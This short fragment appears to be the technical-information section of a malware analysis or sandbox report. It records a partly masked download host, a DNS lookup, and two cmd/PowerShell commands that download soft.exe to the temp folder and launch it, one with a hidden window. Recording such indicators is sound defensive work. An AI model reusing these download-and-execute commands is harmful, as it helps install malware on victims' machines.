Technical Information
- http://st#####icshelter.com/nlog/soft.exe as %temp%\nlog.exe
- DNS ASK st#####icshelter.com
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://st#####icshelter.com/nlog/soft.exe','%temp%\nlog.exe'); Start '%temp%\nlog.exe'' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://st#####icshelter.com/nlog/soft.exe','%temp%\nlog.exe'); Start '%temp%\nlog.exe'